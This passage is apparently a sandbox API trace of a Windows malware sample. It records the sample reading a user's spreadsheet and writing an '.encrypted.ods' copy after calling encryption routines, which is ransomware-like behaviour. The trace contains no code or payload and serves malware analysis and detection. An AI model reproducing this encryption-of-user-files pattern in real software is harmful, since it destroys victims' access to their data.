wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.164] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.164] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0033.164] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\izle.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.164] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.164] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0033.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.164] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0033.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0033.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0033.166] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.166] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.encrypted.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\izle.encrypted.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.167] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0033.167] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.167] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0033.167] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.168] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.168] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x8860, lpOverlapped=0x0) returned 1 [0033.169] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8860) returned 0x8affc0 [0033.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8860) returned 0x935008 [0033.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0033.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.172] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8860) returned 0x8affc0 [0033.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0033.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.172] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.173] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.173] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8860) returned 0x8affc0 [0033.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8c8 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0033.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8860) returned 0x93d870 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.174] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.175] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.175] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da208 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.175] 